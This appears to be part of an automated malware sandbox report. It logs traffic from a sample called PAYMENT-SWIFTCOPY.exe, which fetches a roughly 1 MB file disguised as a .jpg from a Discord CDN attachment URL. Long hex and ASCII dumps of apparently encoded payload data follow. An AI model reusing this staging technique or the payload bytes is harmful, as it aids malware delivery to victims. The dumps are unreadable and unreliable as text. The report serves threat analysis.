                                                                                                2021-10-26 15:34:21 UTC1449INData Raw: 53 4d 20 53 20 69 6e 20 53 20 54 54 70 20 53 20 6e 69 20 53 20 54 54 54 20 53 20 50 54 20 53 20 69 6e 20 53 20 50 50 20 53 20 55 67 20 53 20 6e 54 20 53 20 6e 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 70 50 20 53 20 54 54 69 20 53 20 54 53 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 54 54 4d 20 53 20 55 69 20 53 20 69 6e 20 53 20 50 50 20 53 20 55 67 20 53 20 55 67 20 53 20 6e 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 6e 67 20 53 20 54 4d 4d 20 53 20 54 53 55 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 4f 20 53 20 6e 55 20 53 20 54 54 4d 20 53 20 55 55 20 53 20 69 6e 20 53 20 50 69 20 53 20 70 55 20 53 20 54 53 50 20 53 20 55 69 20 53 20 69 6e 20 53 20 50 50 20 53 20 50 6e 20 53 20 54 53 54 20 53 20 54 53 4f 20 53 20 55
                                                                                                Data Ascii: SM S in S TTp S ni S TTT S PT S in S PP S Ug S nT S np S in S in S pP S TTi S TSn S TSM S in S TTO S nn S TTM S Ui S in S PP S Ug S Ug S nn S in S in S ng S TMM S TSU S TTU S in S iO S nU S TTM S UU S in S Pi S pU S TSP S Ui S in S PP S Pn S TST S TSO S U
                                                                                                2021-10-26 15:34:21 UTC1465INData Raw: 20 4f 55 20 53 20 55 54 20 53 20 70 50 20 53 20 54 53 4f 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 4f 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 69 20 53 20 6e 69 20 53 20 54 54 4f 20 53 20 54 53 4f 20 53 20 70 50 20 53 20 70 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 54 53 53 20 53 20 55 54 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 70 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 70 20 53 20 55 69 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 54 53 54 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 53 55 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 55 54 20 53 20
                                                                                                Data Ascii: OU S UT S pP S TSO S pP S nT S PM S pP S OO S TTO S pP S pP S pP S pP S pP S pP S Ui S ni S TTO S TSO S pP S pO S pO S pP S TSS S UT S pp S iU S pP S nT S Pp S pP S ng S pP S pp S Ui S pP S nT S TSn S pP S TST S TSg S pp S TSU S pP S pn S pP S pP S UT S
                                                                                                2021-10-26 15:34:21 UTC1481INData Raw: 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 69 20 53 20 55 54 20 53 20 70 70 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 54 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 6e 20 53 20 55 54 20 53 20 70 55 20 53 20 69 6e 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 70 6e 20 53 20 70 50 20 53 20 6e 53 20 53 20 6e 67 20 53 20 70 50 20 53 20 54 53 53 20 53 20 55 54 20 53 20 70 70 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20
                                                                                                Data Ascii: P S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S ni S UT S pp S TTO S pp S TTP S pP S nS S TSn S pP S pn S UT S pU S in S pP S TTO S pP S pP S in S in S ig S pn S pP S nS S ng S pP S TSS S UT S pp S TTn S pP S pn S pP S pP S
                                                                                                2021-10-26 15:34:21 UTC1497INData Raw: 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 50 50 20 53 20 54 53 67 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 70 20 53 20 70 70 20 53 20 70 50 20 53 20 55 54 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 67 20 53 20 70 50 20 53 20 70 55 20 53 20 6e 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 6e 20 53 20 70
                                                                                                Data Ascii: pP S pP S TSg S pP S PP S TSg S US S in S in S PM S ng S pP S pP S pP S pP S pP S pP S nS S pp S pp S pP S UT S pU S in S in S TTO S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S Ug S pP S pU S nn S TSg S pP S nn S pP S pP S pP S pP S pP S pP S nn S p
                                                                                                2021-10-26 15:34:21 UTC1513INData Raw: 53 20 70 50 20 53 20 4f 55 20 53 20 54 53 67 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 50 20 53 20 70 50 20 53 20 4f 4f 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 53 55 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 50 20 53 20 70 50 20 53 20 55 70 20
                                                                                                Data Ascii: S pP S OU S TSg S pP S TSg S pP S nM S UP S pP S OO S TTO S pp S TSU S pP S nM S ng S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pU S TTP S pP S Up
                                                                                                2021-10-26 15:34:21 UTC1529INData Raw: 6e 20 53 20 55 6e 20 53 20 50 67 20 53 20 54 53 6e 20 53 20 4f 55 20 53 20 50 54 20 53 20 54 53 53 20 53 20 54 4d 4d 20 53 20 6e 70 20 53 20 54 53 6e 20 53 20 6e 55 20 53 20 54 54 55 20 53 20 4f 55 20 53 20 55 6e 20 53 20 69 4f 20 53 20 54 54 55 20 53 20 4f 55 20 53 20 54 53 50 20 53 20 69 4f 20 53 20 70 55 20 53 20 4f 55 20 53 20 50 53 20 53 20 50 67 20 53 20 69 55 20 53 20 4f 4f 20 53 20 54 53 4f 20 53 20 50 6e 20 53 20 54 54 50 20 53 20 4f 4f 20 53 20 54 4d 54 20 53 20 6e 67 20 53 20 54 53 67 20 53 20 54 53 53 20 53 20 54 53 4f 20 53 20 55 70 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 50 53 20 53 20 54 53 55 20 53 20 54 54 55 20 53 20 4f 55 20 53 20 54 53 70 20 53 20 69 55 20 53 20 54 53 50 20 53 20 6e 55 20 53 20 54 53 50 20 53 20 50 4d 20 53 20 54 54
                                                                                                Data Ascii: n S Un S Pg S TSn S OU S PT S TSS S TMM S np S TSn S nU S TTU S OU S Un S iO S TTU S OU S TSP S iO S pU S OU S PS S Pg S iU S OO S TSO S Pn S TTP S OO S TMT S ng S TSg S TSS S TSO S Up S TMT S OO S PS S TSU S TTU S OU S TSp S iU S TSP S nU S TSP S PM S TT
                                                                                                2021-10-26 15:34:21 UTC1545INData Raw: 55 55 20 53 20 55 54 20 53 20 54 54 4f 20 53 20 70 55 20 53 20 55 54 20 53 20 55 4f 20 53 20 6e 69 20 53 20 6e 50 20 53 20 54 54 54 20 53 20 4f 53 20 53 20 6e 67 20 53 20 54 53 69 20 53 20 54 54 55 20 53 20 4f 4f 20 53 20 6e 55 20 53 20 70 50 20 53 20 55 54 20 53 20 70 4f 20 53 20 6e 70 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 54 53 67 20 53 20 54 53 67 20 53 20 70 4f 20 53 20 70 70 20 53 20 70 50 20 53 20 6e 67 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 55 69 20 53 20 4f 55 20 53 20 50 53 20 53 20 54 4d 53 20 53 20 4f 4f 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 55 69 20 53 20 70 4f 20 53 20 70 4f 20 53 20 70 4f 20 53 20 69 6e 20 53 20 54 54 55 20 53 20 55 55 20 53 20 54 53 53
                                                                                                Data Ascii: UU S UT S TTO S pU S UT S UO S ni S nP S TTT S OS S ng S TSi S TTU S OO S nU S pP S UT S pO S np S pp S UT S pP S pU S TSg S TSg S pO S pp S pP S ng S nS S TTO S pp S Ui S OU S PS S TMS S OO S TTT S TSn S TSn S pO S Ui S pO S pO S pO S in S TTU S UU S TSS
                                                                                                2021-10-26 15:34:21 UTC1561INData Raw: 53 20 54 54 69 20 53 20 54 53 55 20 53 20 69 6e 20 53 20 55 67 20 53 20 55 67 20 53 20 54 53 6e 20 53 20 55 69 20 53 20 55 54 20 53 20 55 6e 20 53 20 54 54 70 20 53 20 6e 69 20 53 20 69 6e 20 53 20 54 53 50 20 53 20 55 50 20 53 20 54 53 53 20 53 20 54 54 70 20 53 20 55 6e 20 53 20 54 54 6e 20 53 20 50 4d 20 53 20 69 67 20 53 20 4f 6e 20 53 20 54 4d 4d 20 53 20 54 53 54 20 53 20 6e 54 20 53 20 54 54 6e 20 53 20 6e 69 20 53 20 69 6e 20 53 20 55 67 20 53 20 54 53 67 20 53 20 6e 70 20 53 20 54 53 50 20 53 20 69 55 20 53 20 70 55 20 53 20 55 54 20 53 20 70 6e 20 53 20 55 69 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 54 53 54 20 53 20 54 53 4d 20 53 20 54 4d 53 20 53 20 4f 6e 20 53 20 55 55 20 53 20 50 50 20 53 20 55 67 20 53 20 55 69 20 53 20 54 54 69 20 53 20
                                                                                                Data Ascii: S TTi S TSU S in S Ug S Ug S TSn S Ui S UT S Un S TTp S ni S in S TSP S UP S TSS S TTp S Un S TTn S PM S ig S On S TMM S TST S nT S TTn S ni S in S Ug S TSg S np S TSP S iU S pU S UT S pn S Ui S TMS S Un S TST S TSM S TMS S On S UU S PP S Ug S Ui S TTi S
                                                                                                2021-10-26 15:34:21 UTC1577INData Raw: 53 20 50 67 20 53 20 6e 6e 20 53 20 55 4d 20 53 20 50 4d 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 70 50 20 53 20 55 4f 20 53 20 70 55 20 53 20 55 70 20 53 20 55 54 20 53 20 55 54 20 53 20 6e 50 20 53 20 70 4f 20 53 20 54 4d 53 20 53 20 55 70 20 53 20 55 50 20 53 20 4f 6e 20 53 20 6e 54 20 53 20 55 50 20 53 20 54 53 67 20 53 20 55 70 20 53 20 55 70 20 53 20 6e 55 20 53 20 6e 53 20 53 20 55 50 20 53 20 54 53 55 20 53 20 55 4d 20 53 20 55 67 20 53 20 55 70 20 53 20 55 70 20 53 20 6e 55 20 53 20 55 50 20 53 20 6e 67 20 53 20 70 4f 20 53 20 50 67 20 53 20 54 53 55 20 53 20 54 53 53 20 53 20 6e 4d 20 53 20 54 53 53 20 53 20 54 54 55 20 53 20 4f 4f 20 53 20 54 53 4f 20 53 20 54 54 50 20 53 20 54 4d 53 20 53 20 6e 70 20 53 20 54 53 70 20 53 20 70 50 20 53 20 54
                                                                                                Data Ascii: S Pg S nn S UM S PM S TTO S nM S pP S UO S pU S Up S UT S UT S nP S pO S TMS S Up S UP S On S nT S UP S TSg S Up S Up S nU S nS S UP S TSU S UM S Ug S Up S Up S nU S UP S ng S pO S Pg S TSU S TSS S nM S TSS S TTU S OO S TSO S TTP S TMS S np S TSp S pP S T
                                                                                                2021-10-26 15:34:21 UTC1593INData Raw: 53 20 54 53 67 20 53 20 55 6e 20 53 20 54 54 50 20 53 20 70 6e 20 53 20 54 53 54 20 53 20 4f 53 20 53 20 55 53 20 53 20 69 4f 20 53 20 6e 69 20 53 20 54 54 70 20 53 20 69 55 20 53 20 6e 70 20 53 20 54 54 69 20 53 20 54 4d 53 20 53 20 50 50 20 53 20 54 53 67 20 53 20 50 53 20 53 20 54 4d 4d 20 53 20 54 54 70 20 53 20 54 54 54 20 53 20 54 53 50 20 53 20 6e 54 20 53 20 70 6e 20 53 20 54 53 67 20 53 20 54 53 54 20 53 20 55 6e 20 53 20 54 54 50 20 53 20 54 53 4f 20 53 20 54 53 69 20 53 20 50 67 20 53 20 54 53 4d 20 53 20 50 6e 20 53 20 55 50 20 53 20 6e 55 20 53 20 54 53 67 20 53 20 54 54 4d 20 53 20 54 54 69 20 53 20 55 55 20 53 20 54 53 70 20 53 20 6e 55 20 53 20 54 53 53 20 53 20 54 54 4f 20 53 20 54 53 70 20 53 20 54 53 50 20 53 20 55 54 20 53 20 54 54 4d
                                                                                                Data Ascii: S TSg S Un S TTP S pn S TST S OS S US S iO S ni S TTp S iU S np S TTi S TMS S PP S TSg S PS S TMM S TTp S TTT S TSP S nT S pn S TSg S TST S Un S TTP S TSO S TSi S Pg S TSM S Pn S UP S nU S TSg S TTM S TTi S UU S TSp S nU S TSS S TTO S TSp S TSP S UT S TTM
                                                                                                2021-10-26 15:34:21 UTC1609INData Raw: 54 4d 53 20 53 20 54 54 69 20 53 20 4f 4f 20 53 20 54 53 53 20 53 20 54 54 4f 20 53 20 54 53 70 20 53 20 54 53 4d 20 53 20 54 53 55 20 53 20 54 53 50 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 53 70 20 53 20 4f 55 20 53 20 54 54 53 20 53 20 54 53 4f 20 53 20 54 54 6e 20 53 20 54 54 6e 20 53 20 54 54 70 20 53 20 67 6e 20 53 20 54 54 55 20 53 20 67 6e 20 53 20 54 54 53 20 53 20 54 53 54 20 53 20 54 53 69 20 53 20 54 54 54 20 53 20 54 54 6e 20 53 20 54 53 53 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 54 53 54 20 53 20 4f 55 20 53 20 54 53 69 20 53 20 54 53 55 20 53 20 67 6e 20 53 20 67 4d 20 53 20 67 6e 20 53 20 54 54 6e 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 54 53 6e 20 53 20 54 53 6e 20 53 20 54 53 70 20
                                                                                                Data Ascii: TMS S TTi S OO S TSS S TTO S TSp S TSM S TSU S TSP S gn S TTP S gn S TSp S OU S TTS S TSO S TTn S TTn S TTp S gn S TTU S gn S TTS S TST S TSi S TTT S TTn S TSS S gn S OO S gn S TTp S TST S OU S TSi S TSU S gn S gM S gn S TTn S TSg S TTO S TSn S TSn S TSp
                                                                                                2021-10-26 15:34:21 UTC1625INData Raw: 53 70 20 53 20 54 53 67 20 53 20 54 53 70 20 53 20 54 53 6e 20 53 20 4f 6e 20 53 20 54 53 53 20 53 20 54 53 53 20 53 20 54 54 55 20 53 20 54 54 50 20 53 20 54 53 70 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 53 70 20 53 20 54 54 69 20 53 20 54 4d 54 20 53 20 4f 55 20 53 20 54 54 50 20 53 20 54 54 6e 20 53 20 54 54 4d 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 54 4d 53 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 54 53 67 20 53 20 54 4d 53 20 53 20 54 53 50 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 54 54 20 53 20 67 6e 20 53 20 4f 6e 20 53 20 54 54 4f 20 53 20 54 54 4f 20 53 20 54 53 4f 20 53 20 67 6e 20 53 20 54 54 4d 20 53 20 67 6e 20 53 20 54 53 53 20 53 20 54 53 4f 20 53 20 54 53 6e 20 53
                                                                                                Data Ascii: Sp S TSg S TSp S TSn S On S TSS S TSS S TTU S TTP S TSp S OO S gn S TTP S gn S TSp S TTi S TMT S OU S TTP S TTn S TTM S gn S TTp S gn S TTp S TMS S TSU S TST S TSg S TMS S TSP S OO S gn S TTT S gn S On S TTO S TTO S TSO S gn S TTM S gn S TSS S TSO S TSn S
                                                                                                2021-10-26 15:34:21 UTC1641INData Raw: 53 20 54 54 67 20 53 20 67 6e 20 53 20 55 54 20 53 20 67 6e 20 53 20 54 53 50 20 53 20 54 53 6e 20 53 20 54 53 70 20 53 20 54 53 50 20 53 20 54 54 50 20 53 20 54 54 4f 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 54 53 4f 20 53 20 4f 6e 20 53 20 54 4d 4d 20 53 20 67 6e 20 53 20 67 4d 20 53 20 67 6e 20 53 20 54 54 53 20 53 20 4f 6e 20 53 20 54 54 54 20 53 20 54 53 69 20 53 20 54 54 53 20 53 20 54 53 54 20 53 20 54 4d 4d 20 53 20 67 6e 20 53 20 67 69 20 53 20 67 6e 20 53 20 54 54 54 20 53 20 54 54 67 20 53 20 4f 4f 20 53 20 54 54 69 20 53 20 54 53 53 20 53 20 54 54 67 20 53 20 54 53 69 20 53 20 54 54 69 20 53 20 54 54 67 20 53 20 54 4d 53 20 53 20 54 53 67 20 53 20 54 4d 53 20 53 20 67 6e 20 53 20 55 6e 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 54 53 6e 20
                                                                                                Data Ascii: S TTg S gn S UT S gn S TSP S TSn S TSp S TSP S TTP S TTO S TTT S TSO S TSO S On S TMM S gn S gM S gn S TTS S On S TTT S TSi S TTS S TST S TMM S gn S gi S gn S TTT S TTg S OO S TTi S TSS S TTg S TSi S TTi S TTg S TMS S TSg S TMS S gn S Un S gn S TTp S TSn
                                                                                                2021-10-26 15:34:21 UTC1657INData Raw: 20 53 20 54 53 55 20 53 20 53 20 67 20 69 70 20 53 20 53 20 67 54 20 70 6e 20 53 20 50 55 20 53 20 4f 4d 20 53 20 54 54 4f 20 53 20 54 53 50 20 53 20 54 54 53 20 53 20 54 53 53 20 53 20 54 54 54 20 53 20 54 54 4f 20 53 20 54 54 50 20 53 20 4f 4d 20 53 20 54 54 70 20 53 20 54 53 54 20 53 20 54 53 4f 20 53 20 54 54 4d 20 53 20 53 20 67 20 4f 4d 20 53 20 53 20 4f 20 69 70 20 53 20 54 53 50 20 53 20 54 54 53 20 53 20 54 53 4d 20 53 20 53 20 69 54 20 55 4d 20 53 20 70 4f 20 53 20 55 53 20 53 20 6e 70 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 4f 20 53 20 4f 50 20 53 20 70 6e 20 53 20 6e 4f 20 53 20 6e 6e 20 53 20 6e 6e 20 53 20 70 50 20 53 20 6e 55 20 53 20 70 55 20 53 20 4f 50 20 53 20 6e 70 20 53 20 6e 67 20 53 20 6e 55 20 53 20 70 4f 20 53 20 53 20 4f 20 69
                                                                                                Data Ascii: S TSU S S g ip S S gT pn S PU S OM S TTO S TSP S TTS S TSS S TTT S TTO S TTP S OM S TTp S TST S TSO S TTM S S g OM S S O ip S TSP S TTS S TSM S S iT UM S pO S US S np S pP S pn S pO S OP S pn S nO S nn S nn S pP S nU S pU S OP S np S ng S nU S pO S S O i
                                                                                                2021-10-26 15:34:21 UTC1673INData Raw: 50 20 70 20 54 70 20 54 20 54 20 67 53 20 53 20 4d 55 20 50 54 20 6e 20 69 54 20 55 20 54 6e 20 54 4d 55 20 54 69 53 20 54 6e 20 54 4d 55 20 54 69 69 20 55 20 55 20 55 20 4d 4f 20 55 20 55 20 55 20 55 20 55 20 4d 20 55 20 55 20 70 20 4d 4f 20 50 20 55 20 4d 20 4d 20 4d 20 4d 20 4d 20 4d 20 4d 20 4d 20 55 20 55 20 55 20 55 20 55 20 4d 20 4d 4f 20 50 20 4d 20 4d 20 4d 20 4d 20 4d 20 4d 20 4d 20 4d 20 54 55 20 69 54 20 50 20 53 20 54 20 55 20 54 55 20 4d 50 20 69 20 53 20 54 20 4f 20 55 20 70 20 53 20 4d 20 55 20 4d 4f 20 50 20 55 20 70 20 53 20 4d 20 70 20 4d 4f 20 50 20 55 20 54 4d 20 53 20 50 20 54 20 54 55 20 54 4d 4f 20 4d 53 54 20 55 20 54 55 20 54 4d 4f 20 4d 53 54 20 55 20 55 20 50 20 53 20 54 20 4d 4f 20 50 20 55 20 50 20 53 20 54 20 54 55 20 4d 4f
                                                                                                Data Ascii: P p Tp T T gS S MU PT n iT U Tn TMU TiS Tn TMU Tii U U U MO U U U U U M U U p MO P U M M M M M M M M U U U U U M MO P M M M M M M M M TU iT P S T U TU MP i S T O U p S M U MO P U p S M p MO P U TM S P T TU TMO MST U TU TMO MST U U P S T MO P U P S T TU MO


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                2192.168.2.549751162.159.130.233443C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:35:11 UTC1680OUTGET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                Connection: Keep-Alive
                                                                                                2021-10-26 15:35:11 UTC1680INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:35:11 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 1023400
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44c0c7ec232c4e-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2122
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "d3cdbf4cf600f86ad718adfd07a223c2"
                                                                                                Expires: Wed, 26 Oct 2022 15:35:11 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:08 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252488534942
                                                                                                x-goog-hash: crc32c=wjkzZg==
                                                                                                x-goog-hash: md5=082/TPYA+GrXGK39B6Ijwg==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 1023400
                                                                                                X-GUploader-UploadID: ADPycdt5fSirEYMb_NkxzZKC7t6tFfhYM04DPAmKMeDPJgfPgiJTBhU38u8ZzkjplNBvCv9YQAkb-5YryF3oMIp-UKg
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3DGqO5iEEdvfg7d%2BVnApCyBZiLPfWxoWMSZWVmRsr%2FdMxgtADVvkAQyjRX%2FVTEjd%2BMyiBFDflMMRfRgesFQQujS17TmMyOtPy1otRQaXU6a8%2BetvbCOVRPNV3zdgelvQ72VGwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:35:11 UTC1681INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:35:11 UTC1681INData Raw: 53 54 4d 67 69 50 70 6e 55 4f 2d 6e 6e 20 4f 53 20 54 69 69 20 53 20 67 20 53 20 53 20 53 20 69 20 53 20 53 20 53 20 4d 50 50 20 4d 50 50 20 53 20 53 20 54 55 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 70 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 54 4d 55 20 53 20 53 20 53 20 54 69 20 67 54 20 54 55 70 20 54 69 20 53 20 54 55 53 20 4f 20 4d 53 50 20 67 67 20 54 55 69 20 54 20 6e 70 20 4d 53 50 20 67 67 20 55 69 20 54 53 69 20 54 53 50 20 54 54 50 20 67 4d 20 54 54 4d 20 54 54 69 20 54 54 54 20 54 53 67 20 54 54 69 20 4f 6e 20 54 53 4f 20 67 4d 20 4f 4f 20 4f 6e 20 54 54 53 20 54
                                                                                                Data Ascii: STMgiPpnUO-nn OS Tii S g S S S i S S S MPP MPP S S TUi S S S S S S S pi S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S TMU S S S Ti gT TUp Ti S TUS O MSP gg TUi T np MSP gg Ui TSi TSP TTP gM TTM TTi TTT TSg TTi On TSO gM OO On TTS T
                                                                                                2021-10-26 15:35:11 UTC1682INData Raw: 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 4d 50 20 69 53 20 4d 4d 4f 20 54 53 4f 20 54 54 50 20 50 53 20 69 55 20 50 53 20 50 53 20 55 69 20 54 54 69 20 54 54 6e 20 54 69 70 20 54 69 67 20 50 53 20 69 55 20 54 67 55 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 54 4d 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50
                                                                                                Data Ascii: S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S MP iS MMO TSO TTP PS iU PS PS Ui TTi TTn Tip Tig PS iU TgU Pi Ui TTi TTn TSO TTM PS TTM PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS P
                                                                                                2021-10-26 15:35:11 UTC1684INData Raw: 70 55 20 4d 69 50 20 50 50 20 55 69 20 54 54 69 20 55 50 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 55 20 50 54 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 54 55 20 50 69 20 55 69 20 54 55 20 4f 54 20 67 54 20 4d 54 20 4f 69 20 4f 50 20 55 54 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 69 55 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 4d 69 55 20 69 4f 20 50 53 20 50 69 20 55
                                                                                                Data Ascii: pU MiP PP Ui TTi UP TSO TTM PS MiU PT Pi Ui TTM TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU TU Pi Ui TU OT gT MT Oi OP UT Pi Ui TMp TTn TSO TTM PS iU iU Pi Ui TTM TTn TSO TTM MiU iO PS Pi U
